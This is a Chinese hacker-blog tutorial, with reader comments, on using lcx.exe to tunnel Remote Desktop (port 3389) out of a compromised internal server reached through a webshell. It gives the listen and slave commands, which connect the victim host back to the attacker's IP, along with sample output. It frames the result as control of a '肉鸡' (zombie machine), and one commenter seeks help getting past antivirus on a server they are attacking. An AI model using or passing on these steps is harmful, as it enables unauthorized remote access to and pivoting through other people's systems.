首页 » 技术文章 » 浏览内容

lcx端口转发详细介绍及使用方法

1645 5 发表评论

在前面的文章中有提到过使用webshell提权-3389连不上解决方法。在里面提到过一款名为 Fpipe的端口转发工具。

这里小编要讲解到另外一款比较强大的LCX端口转发的工具.

下面就先详细讲解下LXC转发工具与使用方法:

lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,

当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389. 

用法:

如在本机B上监听 -listen 51 3389,在肉鸡A上运行-slave

 本机ip 51 肉鸡ip 3389 那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。 

例:现在有一个ip为222.221.221.22的websehll.用端口扫描发现开放了3389端口

可是我们输入外网IP可是不能正常链接。那么很有可能就是内网服务器。我们dos执行ipconfig可以看到。

123

这样的就是内网服务器了。

上传lcx.exe到肉鸡 然后 cx.exe -listen 51 3389 意思是监听51端口并转发到3389端口。

显示如下[+] Listening port 51 …… 
[+] Listen OK! 
[+] Listening port 3389 …… 
[+] Listen OK! 
[+] Waiting for Client on port:51 ……

然后在肉鸡上运行 lcx.exe -slave 你的IP 51 222.221.221.22 3389 
222.221.221.22是我举例用的肉鸡IP.换成你的..运行以后本机监听端口。

显示如下信息

[+] Listening port 51 …… 
[+] Listen OK! 
[+] Listening port 3389 …… 
[+] Listen OK! 
[+] Waiting for Client on port:51 …… 
[+] Accept a Client on port 55 from 222.221.221.22 …… 
[+] Waiting another Client on port:3389….

好了.现在在自己机子上链接 127.0.0.1 或者输你自己IP. 
发现进去的不是自己机子,(或者自己机子根本连不上),而是肉鸡A了!优点,搞定内网肉鸡. 
缺点,有点麻烦,而且每次都要通过sqltools先进行端口转发.当然也可以用反弹木马控制肉鸡

标签:

评论 共 5 条 (RSS 2.0) 发表 评论

  1. 会员头像 岁的ASDA说道:

    话都说不清 小学没毕业么

  2. 会员头像 123说道:

    小残,cx.exe -listen 51 3389 这坨命令是在本机上运行的么

  3. 会员头像 小残、说道:

    @cmdhack 如果是aspx的shell 可以直接端口转发

  4. 会员头像 cmdhack说道:

    :oops: 小残你好 我这边有个一直提不下来的服务器 是内网的 远程终端端口是3380 账号什么的都添加成功了
    就是内网转发那一步 我传的lcx老是被杀软杀掉 所以… :cry: 您能帮我解决下吗

  5. 会员头像 cmdhack说道:

    小残你好 我这边有个一直提不下来的服务器 是内网的 远程终端端口是3380 账号什么的都添加成功了
    就是内网转发那一步 我传的lcx老是被杀软杀掉 所以… :cry: 您能帮我解决下吗

发表评论

  •   没有头像?

关注我们,实时联系

通知公告">更多...

♥如果喜欢本站可以直接点击订阅博客
♥点击此加入晓残博客会员群加入扣群
♥本站免费提供加密解密服务点击解密
♥伙伴们喜欢本站赏个好评呗

关注微信

有偿服务

博客统计

  • 日志总数:477 篇
  • 评论数目:1474 条
  • 标签总数:40 个
  • 页面总数:8 个
  • 分类总数:17 个
  • 友链总数:24 个
  • 建站日期:2011-02-13
  • 运行天数:2124 天
  • 最后更新:2016-12-6

订阅博客